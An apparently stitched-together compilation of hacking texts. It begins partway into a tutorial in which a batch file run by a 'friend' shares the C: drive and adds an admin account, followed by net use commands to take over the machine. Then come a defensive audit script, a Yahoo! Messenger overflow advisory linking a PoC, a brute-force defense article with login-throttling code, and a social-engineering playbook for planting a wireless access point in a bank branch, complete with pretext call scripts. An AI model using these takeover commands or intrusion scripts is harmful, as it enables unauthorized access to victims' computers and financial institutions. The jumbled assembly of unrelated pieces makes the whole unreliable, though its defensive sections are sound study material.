->To see your IP in the DOS prompt, enter this command: ipconfig

-----------------------: Client :----------------
Now that your friend has opened your .bat file, their system has the
C: drive shared and a new administrator user.
First we need to make a session with the remote computer with
the net use command; you will execute these commands from your
DOS prompt.

Command n 1 -> net use \\victimip neo
This command will make a session between you and the victim.
Of course, where it says victimip you will insert the victim's IP.
Command n 2-> explorer \\victimip\system
And this will open an Explorer window on the share system, which is
the C: drive with administrator access!
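What the batch file above leaves behind is visible to an administrator in the output of net share and net localgroup administrators. The following Python script is an added example (not part of the original tutorial) of a host audit that parses that output and flags any non-hidden share that exposes a whole drive, plus any member of Administrators who is not on an allowlist. Both command outputs embedded in the script are constructed samples; on a real host you would feed it the captured output of those two commands.

```python
import re

# Constructed sample output of "net share" on a Windows XP host after the
# batch file has run.  The layout mimics the real command, but the text
# itself is made up for this example.
NET_SHARE_OUTPUT = r"""
Share name   Resource                        Remark

-------------------------------------------------------------------------------
ADMIN$       C:\WINDOWS                      Remote Admin
C$           C:\                             Default share
IPC$                                         Remote IPC
system       C:\
The command completed successfully.
"""

# Constructed sample output of "net localgroup administrators" on the same host.
NET_LOCALGROUP_OUTPUT = """
Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
neo
The command completed successfully.
"""

END_MARKER = "The command completed"
LOCAL_PATH = re.compile(r"^[A-Za-z]:\\")      # e.g. C:\WINDOWS
DRIVE_ROOT = re.compile(r"^[A-Za-z]:\\$")     # exactly a drive root, e.g. C:\


def _table_rows(text):
    """Yield the non-empty lines between the dashed separator and the end marker."""
    in_table = False
    for line in text.splitlines():
        if line.startswith("----"):
            in_table = True
            continue
        if line.startswith(END_MARKER):
            break
        if in_table and line.strip():
            yield line


def parse_net_share(text):
    """Return {share_name: resource_path} from 'net share' output."""
    shares = {}
    for row in _table_rows(text):
        fields = re.split(r"\s{2,}", row.strip())
        name = fields[0]
        # The Resource column is a local path.  IPC$ has an empty Resource,
        # so its Remark becomes the second field; only accept a path there.
        resource = fields[1] if len(fields) > 1 and LOCAL_PATH.match(fields[1]) else ""
        shares[name] = resource
    return shares


def parse_localgroup_members(text):
    """Return the member names listed by 'net localgroup <group>'."""
    return [row.strip() for row in _table_rows(text)]


def audit_host(share_output, localgroup_output, expected_admins):
    """Return findings as tuples: ('share', name, path) for a whole drive
    exposed under a non-hidden name, ('admin-member', name) for an
    Administrators member outside the allowlist."""
    findings = []
    for name, resource in parse_net_share(share_output).items():
        # ADMIN$, C$ and friends are the built-in hidden administrative
        # shares; a drive root under any other name is what the batch
        # file's "net share system=C:\" produces.
        if DRIVE_ROOT.match(resource) and not name.endswith("$"):
            findings.append(("share", name, resource))
    for member in parse_localgroup_members(localgroup_output):
        if member not in expected_admins:
            findings.append(("admin-member", member))
    return findings


if __name__ == "__main__":
    for finding in audit_host(NET_SHARE_OUTPUT, NET_LOCALGROUP_OUTPUT, {"Administrator"}):
        print(*finding)
```

The allowlist is the only site-specific input; everything else is derived from the two command outputs, so the same script can be pointed at the output saved from each workstation you want to check.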

Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability

It has been reported that a remote buffer overflow vulnerability affects Yahoo! Messenger. This issue is due to a failure of the application to securely copy user-supplied input into finite process buffers.


It is likely that the attacker must be in the contact list of an unsuspecting user to exploit this issue. It should be noted that the details surrounding this issue are not clear; this BID will be updated as more details are released.

An attacker may leverage this issue to execute arbitrary code in the context of an unsuspecting user running a vulnerable version of the affected application.

exploit

http://www.elias.burdujeninet.ro//Y!PoC.zip

Preventing a Brute Force or Dictionary Attack: How to Keep the Brutes Away from Your Loot

A brute force attack, also known as a dictionary attack, is one of the more uncomplicated attacks available to a hacker. However, the odds of this type of attack succeeding can be very high if a site is not configured properly. Learn more about what can be done to defend a site against a brute force attack - including implementing incremental delays and carefully wording error messages - and which defensive strategies don't work.

To understand and then combat a brute force attack, also known as a dictionary attack, we must start by understanding why it might be an appealing tool for a hacker. To a hacker, anything that must be kept under lock and key is probably worth stealing. If your Web site (or a portion of it) requires a user to login and be authenticated, then the odds are good that a hacker has tried to break into it. In terms of processing power, it is expensive for a Web site to require authentication, so it is usually only required when the site stores valuable private information. Corporate intranet sites can contain confidential data such as project plans and customer lists. E-commerce sites often store users' email addresses and credit card numbers. Bypassing or evading authentication in order to steal this data is clearly high on a hacker's priority list, and today's hackers have a large library of authentication evasion techniques at their disposal.

Session hijacking attacks such as Cross-site Scripting can steal a user's authentication token and transmit it to a malicious third party, who can then use it to impersonate the legitimate user. SQL injection attacks can also be very effective at bypassing authentication. By sending a specially-formatted username and password combination containing SQL code to the login form, an attacker can often trick the server into granting him unauthorized access. These types of attacks get a lot of attention since they are creative, elegant, and effective. However, there is another type of attack that can be just as effective, if not as elegant or creative. A brute force attack (or dictionary attack) can still be a dangerous threat to your Web site unless proper precautions are taken.

The brute force attack is about as uncomplicated and low-tech as Web application hacking gets. The attacker simply guesses username and password combinations until he finds one that works. It may seem like a brute force or dictionary attack is unlikely to ever succeed. After all, what are the odds of someone randomly guessing a valid username and password combination? Surprisingly, the odds for a brute force attack can be quite good if the site is not properly configured. There are several factors that work to the hacker's advantage, the most important of which is human laziness.

Don't Be Lazy - Choose a Password Carefully!

Generally, people do not remember complicated passwords very well. If users are allowed to create their own passwords, they will often create very simple ones like "password", "1234", their spouse's name, or their favorite sports team. Passwords like these are easy for the user to remember, but unfortunately they are also easy for someone else to guess. Furthermore, any serious hacker who attempts a brute force attack will not be sitting at a Web browser, guessing at authentication credentials and typing them in. He will be using an automated tool for the brute force attack that can make thousands of requests per minute with credentials generated from a large list of possible values. Often this list is an actual dictionary, hence the term "dictionary attack." If a user chooses a common password, such as a dictionary word, the automated tool will eventually guess it, and the user's account will be compromised.

Also, once the brute force attack has revealed a valid username and password combination for one Web site, the hacker knows that the same combination is likely to work for other Web sites. In a study conducted by the University of Wichita, more than half of the test subjects reported using the exact same password for multiple sites. This laziness works to the hacker's advantage. If, for example, a hacker is able to use a dictionary attack to obtain a valid user credential for Amazon.com, then it is probable that the same credential would be valid for other popular Web sites, such as eBay.

Sidestepping a Dictionary Attack with Username Selection

Of course, a password is only half of the required login credential. A username is also required. While it is less likely that a dictionary word would be used as a username, there are still some common usernames that hackers are certain to try with a brute force attack. First among these are "admin" and "administrator". These names are especially dangerous since they are not only easily guessed, but the accounts they represent are usually highly privileged administrative accounts. If the hacker's dictionary attack could gain access to an administrative account, he could probably do much more damage to the system than he could if he gained access to a regular user's account.

Administrative accounts are not the only problem: many Web applications and Web application frameworks create default users during installation. If the site administrator does not remove these default users or at least change their passwords, these accounts will be easy targets for a dictionary attack. Finally, when users are allowed to choose their own usernames, they often choose their email address, since it is easy to remember. Once again, the user's laziness is a benefit to a hacker using a brute force attack. Armed with a list of email addresses (perhaps obtained from a spammer) and a dictionary of passwords (easily obtained anywhere), an attacker has an excellent chance of breaking into at least one user's account.

Countering a Brute Force Attack with a Strong Password Policy

The primary defense against a brute force attack must be enforcement of a strong password policy. As mentioned earlier, dictionary words make poor passwords. Password size is also important: the longer the password, the more difficult it will be to force. While there is no strict definition of a strong password that will be harder to determine via a dictionary attack, some good guidelines would be:

  • Minimum length of at least seven characters
  • Must include both upper and lower case characters
  • Must include numeric characters
  • Must include punctuation

These guidelines may seem overly strict, but there is little chance that a password created with these restrictions will be found with a brute force attack. There are almost 70 trillion combinations of characters that can be seven digits long and can include upper case characters, lower case characters, numbers, and punctuation. Even a dictionary attack tool that could make one hundred requests per second would still take over 11,000 years before it would be statistically likely to guess the password.

Obviously, most Web sites will want to block a dictionary attack much sooner than 11,000 years into the attack. Many organizations use an intrusion detection system (IDS) to detect an abnormally high number of requests coming from a single user. This is a good idea, but it is not sufficient to prevent the brute force attack. A clever hacker will simply reduce the bandwidth used by his automated tool until it falls under the alert threshold of the IDS.

Other Defensive Strategies - And Why They Don't Work

Another common defense strategy against a dictionary attack is to automatically disable an account after a certain number of failed login attempts. For example, if the server detects that the user "bobsmith" has provided an incorrect password three times since his last login, the server might decide that the "bobsmith" account is the subject of a brute force attack and will disable it. The account may automatically reactivate after 30 minutes, or the user might have to contact the site administrator to have the account reactivated. In either case, automatically disabling user accounts is a poor security mechanism to fight a dictionary attack. In the first place, by disabling accounts the system has traded an authentication evasion vulnerability for a denial of service vulnerability. If an attacker can disable an account by incorrectly guessing its password three times every 30 minutes, he can effectively prevent that user from ever accessing the system. Imagine how damaging a dictionary attack could be if it were used against an administrative account.

In the second place, locking out accounts is ineffective against a brute force attack because this technique assumes that the attacker is keeping the username constant and varying the password. What if the attacker instead kept the password constant and varied the username? We already know that a large percentage of users use common passwords like "password". A hacker using a dictionary attack could try "password" for each of the users in his username list, which would not only have a high chance of success, but would also evade the account lockout logic. An attacker could make thousands of login attempts, and even if every one of them failed, the system will only register one incorrect login per account.

A Better Defense: Incremental Delay

A better strategy for blocking any brute force attack is to incrementally delay the page response after failed login attempts. After the first failed login attempt, for example, the response would be delayed by one second. After the second failed attempt, the response would be delayed by two seconds, and so on. A one-, two-, or even six-second delay is probably not going to bother a human user too seriously. Certainly he will find it less irritating than having to wait 30 minutes for his account to reactivate because he accidentally left his caps lock key on. On the other hand, an incrementing delay can completely defeat an automated tool being used for a brute force attack. Assuming the tool could normally make ten requests per second, the time it would take to make one thousand requests would jump from two minutes to five days. This pretty much renders the brute force attack tool useless. An incrementing delay also solves the problem of the attacker holding the password constant and varying the username. Since the system tracks failed login attempts on a user session basis and not an authentication credential basis, the delay logic cannot be bypassed this way.

There is one serious shortcoming to the incrementing delay approach: state must be kept in order to record the number of failed login attempts by the current user. The dictionary attack tool can be set up to begin a new session on every request by never sending a session identification token to the server. In this situation, the server will not be able to track the number of failed logins, and the delay will not be properly applied. It is possible to track a user from his IP address instead of his session token, but this technique has problems as well. Sometimes multiple users share a single IP address, and sometimes a single user can change IP addresses between requests. While the incrementing delay technique is not perfect, in many cases it is a better solution to fighting a dictionary attack than the widely used practice of locking out accounts after failed login attempts.

Carefully Word Your Error Messages

Finally, it is important to create appropriate error messages in response to failed login attempts. Many Web sites inadvertently aid hackers by providing overly helpful error messages. Consider the difference between the messages "User ID not found" and "Incorrect password." These messages give a lot of information to a potential attacker. "User ID not found" tells the hacker that the user he is trying to determine via brute force attack does not exist in the system. There is no point in continuing to try different passwords for this username. He can continue on to the next username in the list, saving himself thousands of useless requests and hours of time. On the other hand, "Incorrect password" tells him that the username he has tried with his dictionary attack does exist, but that the password is wrong. Now he knows that he has a potential victim and can focus his efforts on breaking that user's password. It is much safer for the application to respond with an ambiguous message like "Incorrect username or password" when a login attempt fails. There is no way to tell from this error which part of the credential was invalid. Therefore, there are no clues that a hacker can obtain from this error that can help him reduce his workload and break the system faster.
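The three mechanisms discussed in the last sections (per-account lockout, an incremental delay keyed on the session with client IP as the fallback, and one ambiguous error message) can be put side by side in code. The following Python is an added example and not the article's own: it keeps a constructed in-memory user store, returns the delay a real handler would sleep for instead of sleeping, and replays the two request patterns the article describes so you can see which control reacts to each.

```python
import hmac
from dataclasses import dataclass, field

GENERIC_ERROR = "Incorrect username or password"

# Constructed user store (username -> password).  Plain text only to keep
# the example short; a real store holds salted, slow hashes.
USERS = {"bobsmith": "Tr0ub4dor&3", "alice": "correct horse"}


@dataclass
class LoginGuard:
    """Failed-login bookkeeping for one application.

    per_session and per_ip drive the incremental delay; per_account is
    kept only to show what the account-lockout policy would have done."""
    lockout_threshold: int = 3
    per_session: dict = field(default_factory=dict)
    per_ip: dict = field(default_factory=dict)
    per_account: dict = field(default_factory=dict)

    def _delay(self, session_id, client_ip):
        # The larger counter applies: a client that opens a fresh session
        # for every request (the bypass the article notes) is still slowed
        # by the per-IP counter.
        return max(self.per_session.get(session_id, 0), self.per_ip.get(client_ip, 0))

    def attempt(self, username, password, session_id, client_ip):
        """Return (ok, delay_seconds, message).  A real handler would
        time.sleep(delay_seconds) before sending the response."""
        stored = USERS.get(username)
        # compare_digest does not leak where the first mismatching byte is.
        ok = stored is not None and hmac.compare_digest(stored, password)
        if ok:
            delay = self._delay(session_id, client_ip)
            self.per_session.pop(session_id, None)
            # per_ip is left alone: several users may share one address,
            # and one success must not clear the delay for all of them.
            return True, delay, None
        self.per_session[session_id] = self.per_session.get(session_id, 0) + 1
        self.per_ip[client_ip] = self.per_ip.get(client_ip, 0) + 1
        self.per_account[username] = self.per_account.get(username, 0) + 1
        # One message for "no such user" and "wrong password" alike, so the
        # response does not confirm which usernames exist.
        return False, self._delay(session_id, client_ip), GENERIC_ERROR

    def lockout_would_fire(self, username):
        """What the article's account-lockout policy would decide."""
        return self.per_account.get(username, 0) >= self.lockout_threshold


def replay(guard, attempts):
    """Feed (username, password, session_id, ip) tuples to the guard and
    return (total delay in seconds, usernames the lockout policy would lock)."""
    total = 0
    for username, password, session_id, ip in attempts:
        _, delay, _ = guard.attempt(username, password, session_id, ip)
        total += delay
    locked = sorted(u for u in guard.per_account if guard.lockout_would_fire(u))
    return total, locked


if __name__ == "__main__":
    # Pattern 1 from the article: one password, many usernames, one session.
    # Lockout never fires; the delay grows on every request.
    constant_password = [(f"user{i}", "password", "sess-A", "198.51.100.7") for i in range(5)]
    print(replay(LoginGuard(), constant_password))   # (15, [])
    # Pattern 2: one username, a fresh session per request.  The per-IP
    # counter keeps the delay growing; lockout would also have fired.
    fresh_sessions = [("bobsmith", "wrong", f"sess-{i}", "198.51.100.7") for i in range(5)]
    print(replay(LoginGuard(), fresh_sessions))      # (15, ['bobsmith'])
```

The per-IP fallback carries the cost the article warns about: users behind a shared address inherit each other's delays, which is why the counter is a fallback and not the primary key.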

Conclusion

In conclusion, sometimes old, boring attacks can work just as well as the new, exciting ones. Low-tech as it might be, a brute force attack can be very effective at compromising your Web application unless proper defenses are used. The first and foremost method of defeating a brute force attack is to require all users to choose a strong password. Passwords should be required to contain at least seven characters, with mixed upper- and lower-case letters, numbers, and punctuation. Also, consider implementing an incrementing response delay routine in your application in place of an automatic account lockout. Finally, be sure to display nondescript, ambiguous login failure messages such as "Invalid username or password." Messages like this provide no extra information about the system that a hacker using a dictionary attack can take advantage of to lighten his workload. Following these guidelines will help you protect your application and your users from the brutes of the world.

Social Engineering: How It Is Done

This is an example from an audit I actually performed. Social Engineering is the act of bypassing operational security measures, in this case meaning bypassing corporate policies that have been set for employees in order to gain information. The process is quite simple: in the same manner that a Trojan horse projects itself as something it is not, you are going to project yourself as something you are not.


** Warning **
These examples are only to be performed on an institution that has hired you for performing this type of testing action. Any one of these actions will be considered a Federal Crime. This information is intended as help for Network Security Consulting firms or Security Consulting firms.
***********



As in any project you are going to take on, you must set an achievable goal. For this example we wish to set up a wireless access point within a bank so that we can leisurely access the information from within the institution while safely outside. After proposing this idea to the institution for approval, and once it is approved, we need to decide what items we will need.

Insurance Items
First you need to put each of your actions and times of interaction with staff into a well organized document that should be approved by the Board of Directors of the organization. Have an original of this document notarized and with you. In addition, have a separate letter on the company's letterhead, signed, with a copy of the license of the executive assigned to oversee the test. Have a direct phone number for the overseeing executive as well as a secondary cell phone to ensure they will be contactable in case of a failed attempt. If your test fails and the staff follow procedures, you will be arrested. You will need these documents and information so that authorities can contact the proper individuals and determine the credence of your story.

Your Story
You must remember you are crafting a piece of fiction not only to deceive other individuals but also to encourage them to actively participate. The most common story I would use is that a branch office is having network latency, in other words slow connections to the internet and central office locations. This is a perfect story for a few reasons.

1) Everyone believes their connections could be faster, to the internet and elsewhere.

2) It allows you to enter the networking cabinet to install your wireless access point, and allows it to be out of plain sight.

3) No one ever knows where it is, so it gives you a bit of roaming capability, and if you are escorted it increases their impatience, which is important (more on that later).

4) It ensures you do not have to work on an individual's PC; you always want to avoid working on someone's PC. This is because a PC is part of a person's personal space. If you are working on it, they will take great interest in what you are doing, which is something you do not want.

5) It is simple and easy to understand but complex enough to bore people; if something is complex, people scrutinize it more. We are using something they take for granted (network connectivity) and something they have no interest in learning about. Using excuses such as cleaning spyware off of a machine encourages interactivity. They could have a machine at home that has a spyware problem, so they may want to see what you are doing to learn how to fix their own. Interactivity is something you don't want.

The Props
Just as in a movie or a play, proper props will enhance the experience of the audience and put them at ease. In our case we are looking to do the same thing. Before covering what to bring, let's cover what not to bring, which is more important. Objects that encourage interaction or curiosity are what we don't want.

1) No laptops: In this case we do not need one. They encourage people to look at what you are doing on the screen, and can also send red flags that you are copying information. If you have to bring one, make it an old one, and make the wallpaper have the logo of your fictitious company. Usually on the outside of the laptop I will include a fake "Property Of:" label, like "Property of: Light Speed Technologies (if lost contact: insert fake number here)".

2) No fancy consumer gadgets: You don't want anything that is a conversation starter. You want people disinterested in you.

Now items that you should have:

1) Uniform: This should be the classic collared work shirt with the company logo on the breast pocket. Make sure it is wrinkled and even slightly dirty; nothing horrible, but you need to look like you have been sitting in your truck all day drinking coffee, going from site to site. Jeans or wrinkled khakis will round out the ensemble. Get yourself some work boots that are well worn. The key is to look like you have been at your fictional company for a while; you are a seasoned veteran just doing the daily grind.

2) Work Bag: I use a well-worn work bag that is open on the top so people do not think that anything is concealed inside. This is a common bag electricians use. I keep tools attached to the outside like pliers and cables, with zip ties attached to it. I then put the wireless access point under the cables. For the contents, use everything you would take on a networking call. You are an IT professional; you should know what needs to be inside. Remember: nothing new.

3) Clipboard and Work Orders: Create some fake work order forms or copy them from the internet. Fill out a couple as if from other fictional offices. The key is to look like you have been out all day. Make sure the forms don't look so crisp that you just printed them out from a printer an hour ago. Your local office supply store will also sell generic carbon paper work order forms.

4) Work Van: Not necessary if the parking lot is not within eyeshot. But if it is, a quick $50 rental from a home improvement store is great, especially since the trucks are in terrible shape and dirty. Go on the net and order some magnetic signs with your company logo and name that you can stick to the side. They are extremely cheap, you can use them over and over again, and they easily cover any other logos on the truck.

5) Wireless Access Point: I always use some form of commercial enterprise brand of access point, such as a Cisco Aironet. Never use a consumer grade device. First, it will have poor range; second, it will be recognizable to any escort you may have. I usually airbrush a matte black finish over the device to cover any lettering that may indicate its actual use, and it helps it blend into dark spaces. You should have this configured to be secure; you do not want to open holes in the security of a bank.

6) LAN testing device: a large handheld like those Microtech or Fluke produce. Plugging this into the network will not send up any red flags since it does not look like a computer. And the look lets even the least techy of a person know it is some sort of testing device.

The Target
First, your greatest chance of success is with a mid-size bank. In small banks everyone knows each other; large banks most likely have internal staff that perform these functions.

Second, find the smallest branch, the farthest from the main office. They are used to having shoddy service; they probably see IT once or twice a year. It will also have the most inexperienced branch manager. The people here are used to being less diligent and are the best targets for not asking questions.

Information Gathering
Visit the bank's website. If they have a direct number for IT, great; if not, you can use the main number. Call the number posing as a telemarketer. Operate just like a telemarketer; they are great at social engineering. When calling, just ask "Can I speak to who handles IT?" and they will forward you over to an IT engineer; most executive secretaries will know you are a telemarketer and will forward you to someone less important. The entire time, take down the names of each person you hear, writing down what you assume the job function is. Whoever you get, hit them with your canned message; 99% of the time they will hang up on you, which is fine, you have the information you need.

Next, take a drive out to your target site. Take note of the foot traffic going in and out, what times are busy and what time they close up shop. If bank hours are until 4pm and you see them locking the doors at 4:00 exactly and out the door by 4:05pm, you know you picked the perfect location. These people are in a hurry to leave, and this will increase their impatience and encourage mistakes.

The Timing
If the branch closes at 4:00pm on a Friday, we are going to schedule our appearance for 3:00pm and show up at 3:30. Why? Because people want to leave and they are not going to be interested in what you are doing at all.

The Setup
Now this might seem a bit different from what other people may do, but I call ahead of time and schedule my visit. Why? Because no one expects an intruder to schedule their time with the victim. This also means that you do not need a story to get in the front door; showing up unannounced will increase suspicions and encourage them to call the main office. Many people use the old "Do you mean the main office didn't call you?" That sends up immediate red flags. If you can, have a female coworker call for you. I know it is stereotypical, but it does lower the guard of many people. You or your colleague should call Thursday at lunch time. Ask for the branch manager. Your script should go like this:

You: Hello can I speak to the branch manager please?

Target: Yes that is me

You: I am just calling to schedule one of our engineers who is coming to your branch. The (insert main office location) informed us that your location has been experiencing latency or slowness when using the internet or contacting the main office. Our engineer will test the line and install an upgrade if need be. Unfortunately we only have 3pm tomorrow, since the engineer is going to be at other branches in the morning.

Target: I didn't know that was happening?

You: Yes (insert IT employee here) has been working with your other branches on the same issue.

Target: Ok thank you.

You: Here is our number if you notice any issues with your connection between now and then please do not hesitate to contact us.

Giving them the number is very important. First, it relaxes the branch manager by indicating you are a real company. Second, if anyone becomes suspicious, you will receive a call. That tells you your cover is blown before you show up, and saves you the trouble of having to deal with the local authorities.

Game Day
It's Friday. Park in a lot down the street, then call the branch at 3:10, already 10 minutes late. Tell them you are the engineer and give your name (always use your real first name; it helps you act natural). Apologize for being late and tell the manager you are almost there. Now show up at 3:30. Your conversation should go like this:

You: I am very sorry that I am so late. Dispatch has been messing up the locations all day. I can get this done real quick, since you guys are probably closing soon.

Target: That's ok, what do you need to do?

You: I just need to know where the network closet is. It's probably the one with all the wires going to it.

Target: Oh yeah, I know where that is. (They won't be suspicious of this. They are trained to be nervous about the money; if you stay clear of the vault and the teller stations, no one will be concerned with you.)

Target: Here it is.

You: Thanks, let's see what we've got. (Hook up your testing gear, fiddle with wires, and take your time. If you are lucky they will ask whether they can leave you there because they have some work to finish up. Yes, that is actually what happened to me, and it made the installation a breeze. If not, continue with the dialog.)

You: Yeah, you guys are definitely having some slowness. (Show them the test screen; it doesn't matter what it says.) I will put an accelerator in, that should speed everything up. It will only take me a few seconds. (Now just connect your wireless access point.)

You: There, all set. Sorry again for being late. I just need you to initial the work order and I will get out of here. Also, do you have a card? I will call you next week to see if everything is working ok.


And now you leave. You were a great engineer, and you have successfully performed a social engineering attack. With each project that involves social engineering you will get more comfortable, and hence much more successful. Hopefully this will help other engineers out. It took me a number of tries before I was able to come up with this method, and it has been extremely successful.

--B